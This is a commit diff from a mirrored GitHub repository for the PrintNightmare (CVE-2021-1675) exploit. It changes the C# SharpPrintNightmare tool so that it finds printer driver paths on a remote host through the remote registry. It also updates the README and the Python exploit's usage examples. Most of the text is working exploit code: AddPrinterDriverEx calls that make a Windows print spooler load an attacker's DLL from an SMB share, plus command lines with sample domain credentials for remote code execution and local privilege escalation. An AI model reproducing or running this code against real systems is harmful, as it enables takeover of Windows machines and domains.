r3pek/CVE-2021-1675
1
0
Fork 0
mirror of https://github.com/cube0x0/CVE-2021-1675.git synced 2024-12-22 02:36:33 +00:00
Code Releases Activity

C# Dynamic pDriverPath support

Browse source 
Signed-off-by: cube0x0 <vidfelt@protonmail.com>
This commit is contained in:
cube0x0 2021-07-04 21:55:28 +02:00
parent 4b2c8cf663
commit 18fde4bfec
5 changed files with 97 additions and 55 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
CVE-2021-1675.py
View file

@ -102,7 +102,7 @@ if __name__ == '__main__':
parser = argparse.ArgumentParser(add_help = True, description = "CVE-2021-1675 implementation.",formatter_class=argparse.RawDescriptionHelpFormatter,epilog=""" parser = argparse.ArgumentParser(add_help = True, description = "CVE-2021-1675 implementation.",formatter_class=argparse.RawDescriptionHelpFormatter,epilog="""
Example; Example;
./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\\smb\\addCube.dll' ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\\smb\\addCube.dll'
./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\smb\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL' ./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\\\192.168.1.215\\smb\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL'
""") """)
parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>') parser.add_argument('target', action='store', help='[[domain/]username[:password]@]<targetName or address>')
parser.add_argument('share', action='store', help='Path to DLL. Example \'\\\\10.10.10.10\\share\\evil.dll\'') parser.add_argument('share', action='store', help='Path to DLL. Example \'\\\\10.10.10.10\\share\\evil.dll\'')

BIN
Images/impacket-mspar.PNG Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 222 KiB

6
SharpPrintNightmare/README.md
View file

@ -4,6 +4,8 @@
New `CVE-2021-1675.py` has been uploaded which will get the same result as the C# version New `CVE-2021-1675.py` has been uploaded which will get the same result as the C# version
No longer need to manually specify pConfigFile with C# version
### Usage ### Usage
The RCE functionality might need to be executed with local administrator privileges on YOUR machine. The RCE functionality might need to be executed with local administrator privileges on YOUR machine.
@ -13,10 +15,10 @@ The RCE functionality might need to be executed with local administrator privile
C:\SharpPrintNightmare.exe C:\addCube.dll C:\SharpPrintNightmare.exe C:\addCube.dll
#RCE using existing context #RCE using existing context
SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_addb31f9bff9e936\Amd64\UNIDRV.DLL' '\\192.168.1.20' SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' '\\192.168.1.20'
#RCE using runas /netonly #RCE using runas /netonly
SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL' '\\192.168.1.10' hackit.local domain_user Pass123 SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' '\\192.168.1.10' hackit.local domain_user Pass123
``` ```
![](../Images/poc4.png) ![](../Images/poc4.png)

BIN
SharpPrintNightmare/SharpPrintNightmare/.vs/SharpPrintNightmare/v16/.suo
View file

Binary file not shown.

144
SharpPrintNightmare/SharpPrintNightmare/Program.cs
View file

@ -1,6 +1,9 @@
using System; using Microsoft.Win32;
using System;
using System.Collections.Generic;
using System.ComponentModel; using System.ComponentModel;
using System.IO; using System.IO;
using System.Linq;
using System.Runtime.InteropServices; using System.Runtime.InteropServices;
using Tools; using Tools;
@ -17,6 +20,7 @@ namespace SharpPrintNightmare
//https://www.pinvoke.net/default.aspx/winspool/EnumPrinterDrivers.html //https://www.pinvoke.net/default.aspx/winspool/EnumPrinterDrivers.html
[DllImport("winspool.drv", CharSet = CharSet.Auto, SetLastError = true)] [DllImport("winspool.drv", CharSet = CharSet.Auto, SetLastError = true)]
static extern bool EnumPrinterDrivers(String pName, String pEnvironment, uint level, IntPtr pDriverInfo, uint cdBuf, ref uint pcbNeeded, ref uint pcRetruned); static extern bool EnumPrinterDrivers(String pName, String pEnvironment, uint level, IntPtr pDriverInfo, uint cdBuf, ref uint pcbNeeded, ref uint pcRetruned);
public struct DRIVER_INFO_2 public struct DRIVER_INFO_2
{ {
public uint cVersion; public uint cVersion;
@ -46,8 +50,8 @@ namespace SharpPrintNightmare
static void Main(string[] args) static void Main(string[] args)
{ {
string dllpath; string dllpath;
string pDriverPath = ""; string computername = null;
string path = null; string pDriverPath = null;
//network credentials wont be used for LPE //network credentials wont be used for LPE
string domain = "NeverGonnaGiveYouUp"; string domain = "NeverGonnaGiveYouUp";
string user = "NeverGonnaLetYouDown"; string user = "NeverGonnaLetYouDown";
@ -57,72 +61,77 @@ namespace SharpPrintNightmare
{ {
Console.WriteLine("-Locally"); Console.WriteLine("-Locally");
Console.WriteLine(" .\\SharpPrintNightmare.exe C:\\addCube.dll"); Console.WriteLine(" .\\SharpPrintNightmare.exe C:\\addCube.dll");
Console.WriteLine(" .\\SharpPrintNightmare.exe 'C:\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL'");
Console.WriteLine("-Remote using current context"); Console.WriteLine("-Remote using current context");
Console.WriteLine(" .\\SharpPrintNightmare.exe '\\\\192.168.1.215\\smb\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL' '\\\\192.168.1.20'"); Console.WriteLine(" .\\SharpPrintNightmare.exe '\\\\192.168.1.215\\smb\\addCube.dll' '\\\\192.168.1.20'");
Console.WriteLine("-Remote using runas"); Console.WriteLine("-Remote using runas");
Console.WriteLine(" .\\SharpPrintNightmare.exe '\\\\192.168.1.215\\smb\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL' '\\\\192.168.1.20' hackit.local domain_user Pass123"); Console.WriteLine(" .\\SharpPrintNightmare.exe '\\\\192.168.1.215\\smb\\addCube.dll' '\\\\192.168.1.20' hackit.local domain_user Pass123");
Environment.Exit(0); Environment.Exit(0);
} }
dllpath = args[0]; dllpath = args[0];
if (args.Length > 1)
{
pDriverPath = args[1];
}
else
{
DRIVER_INFO_2[] drivers = getDrivers();
foreach (DRIVER_INFO_2 driver in drivers)
{
//Console.WriteLine(driver.pDriverPath); //debugcd
if (driver.pDriverPath.ToLower().Contains("filerepository"))
{
pDriverPath = driver.pDriverPath;
break;
}
}
//could not find driver path
if (pDriverPath == "")
{
Console.WriteLine($"[-] pDriverPath {drivers[0].pDriverPath}, expected :\\Windows\\System32\\DriverStore\\FileRepository\\.....");
Console.WriteLine($"[-] Specify pDriverPath manually");
Environment.Exit(1);
}
}
Console.WriteLine($"[*] pDriverPath {pDriverPath}");
Console.WriteLine($"[*] Executing {dllpath}");
if (args.Length > 2) if (args.Length > 2)
{ {
path = args[2]; domain = args[2];
} user = args[3];
if (args.Length > 3) password = args[4];
{
domain = args[3];
user = args[4];
password = args[5];
} }
//runas /netonly //runas /netonly
using (new Impersonator.Impersonation(domain, user, password)) using (new Impersonator.Impersonation(domain, user, password))
{ {
if (args.Length > 1 && args.Length <= 5)
{
//Find remote drivers
computername = args[1];
List<string> drivers = getDrivers(computername);
pDriverPath = Path.GetDirectoryName(drivers[0]) + "\\Amd64\\UNIDRV.DLL";
if (string.IsNullOrEmpty(pDriverPath))
{
Console.WriteLine($"[-] Specify pDriverPath manually");
Environment.Exit(1);
}
}
//if OpenRemoteBaseKey fails
else if (args.Length > 5)
{
pDriverPath = args[5];
}
else //Find local driver
{
DRIVER_INFO_2[] drivers = getDrivers();
foreach (DRIVER_INFO_2 driver in drivers)
{
//Console.WriteLine(driver.pDriverPath); //debugcd
if (driver.pDriverPath.ToLower().Contains("filerepository"))
{
pDriverPath = driver.pDriverPath;
break;
}
}
//could not find driver path
if (string.IsNullOrEmpty(pDriverPath))
{
Console.WriteLine($"[-] pDriverPath {drivers[0].pDriverPath}, expected :\\Windows\\System32\\DriverStore\\FileRepository\\.....");
Console.WriteLine($"[-] Specify pDriverPath manually");
Environment.Exit(1);
}
}
Console.WriteLine($"[*] pDriverPath {pDriverPath}");
Console.WriteLine($"[*] Executing {dllpath}");
Console.WriteLine("[*] Try 1..."); Console.WriteLine("[*] Try 1...");
addPrinter(dllpath, pDriverPath, path); addPrinter(dllpath, pDriverPath, computername);
Console.WriteLine("[*] Try 2..."); Console.WriteLine("[*] Try 2...");
addPrinter(dllpath, pDriverPath, path); addPrinter(dllpath, pDriverPath, computername);
Console.WriteLine("[*] Try 3..."); Console.WriteLine("[*] Try 3...");
addPrinter(dllpath, pDriverPath, path); addPrinter(dllpath, pDriverPath, computername);
} }
} }
static void addPrinter(string dllpath, string pDriverPath, string path = null) static void addPrinter(string dllpath, string pDriverPath, string computername)
{ {
//pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL"; // 2019 debug //pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL"; // 2019 debug
//pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_addb31f9bff9e936\\Amd64\\UNIDRV.DLL"; // 2016 debug //pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_addb31f9bff9e936\\Amd64\\UNIDRV.DLL"; // 2016 debug
//DRIVER_INFO_2 Level2 = drivers[0]; // debug
DRIVER_INFO_2 Level2 = new DRIVER_INFO_2(); DRIVER_INFO_2 Level2 = new DRIVER_INFO_2();
Level2.cVersion = 3; Level2.cVersion = 3;
Level2.pConfigFile = "C:\\Windows\\System32\\winhttp.dll"; //replace kernelbase with winhttp Level2.pConfigFile = "C:\\Windows\\System32\\winhttp.dll"; //replace kernelbase with winhttp
@ -139,7 +148,7 @@ namespace SharpPrintNightmare
Marshal.StructureToPtr(Level2, pnt, false); Marshal.StructureToPtr(Level2, pnt, false);
//call AddPrinterDriverEx //call AddPrinterDriverEx
AddPrinterDriverEx(path, 2, pnt, flags); AddPrinterDriverEx(computername, 2, pnt, flags);
Console.WriteLine("[*] Stage 0: " + Marshal.GetLastWin32Error()); Console.WriteLine("[*] Stage 0: " + Marshal.GetLastWin32Error());
Marshal.FreeHGlobal(pnt); Marshal.FreeHGlobal(pnt);
@ -154,7 +163,7 @@ namespace SharpPrintNightmare
Marshal.StructureToPtr(Level2, pnt2, false); Marshal.StructureToPtr(Level2, pnt2, false);
//call AddPrinterDriverEx //call AddPrinterDriverEx
AddPrinterDriverEx(path, 2, pnt2, flags); AddPrinterDriverEx(computername, 2, pnt2, flags);
int errorcode = Marshal.GetLastWin32Error(); int errorcode = Marshal.GetLastWin32Error();
Marshal.FreeHGlobal(pnt2); Marshal.FreeHGlobal(pnt2);
if (errorcode == 0) if (errorcode == 0)
@ -166,13 +175,44 @@ namespace SharpPrintNightmare
} }
} }
static DRIVER_INFO_2[] getDrivers(string path = null) static List<string> getDrivers(string computername)
{
computername = computername.Trim('\\');
string driverpath = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Print\\PackageInstallation\\Windows x64\\DriverPackages";
List<string> drivers = new List<string>();
try
{
RegistryKey environmentKey = RegistryKey.OpenRemoteBaseKey(RegistryHive.LocalMachine, computername);
foreach (string subKeyName in environmentKey.OpenSubKey(driverpath).GetSubKeyNames().Where(item => item.Contains("ntprint.inf_amd64")))
{
string path;
//Console.WriteLine(subKeyName);
path = (string)environmentKey.OpenSubKey(driverpath + "\\" + subKeyName).GetValue("DriverStorePath");
//Console.WriteLine(path);
if (!String.IsNullOrEmpty(path))
{
drivers.Add(path);
}
}
environmentKey.Close();
}
catch
{
Console.WriteLine("[-] Failed to enumerate printer drivers");
Environment.Exit(1);
}
return drivers;
}
static DRIVER_INFO_2[] getDrivers()
{ {
uint cbNeeded = 0; uint cbNeeded = 0;
uint cReturned = 0; uint cReturned = 0;
//path = "\\\\192.168.1.20";
if (EnumPrinterDrivers(path, "Windows x64", 2, IntPtr.Zero, 0, ref cbNeeded, ref cReturned)) if (EnumPrinterDrivers(null, "Windows x64", 2, IntPtr.Zero, 0, ref cbNeeded, ref cReturned))
{ {
//succeeds, but shouldn't, because buffer is zero (too small)! //succeeds, but shouldn't, because buffer is zero (too small)!
throw new Exception("EnumPrinters should fail!"); throw new Exception("EnumPrinters should fail!");
@ -186,7 +226,7 @@ namespace SharpPrintNightmare
} }
IntPtr pAddr = Marshal.AllocHGlobal((int)cbNeeded); IntPtr pAddr = Marshal.AllocHGlobal((int)cbNeeded);
if (EnumPrinterDrivers(path, "Windows x64", 2, pAddr, cbNeeded, ref cbNeeded, ref cReturned)) if (EnumPrinterDrivers(null, "Windows x64", 2, pAddr, cbNeeded, ref cbNeeded, ref cReturned))
{ {
DRIVER_INFO_2[] printerInfo2 = new DRIVER_INFO_2[cReturned]; DRIVER_INFO_2[] printerInfo2 = new DRIVER_INFO_2[cReturned];
long offset; long offset;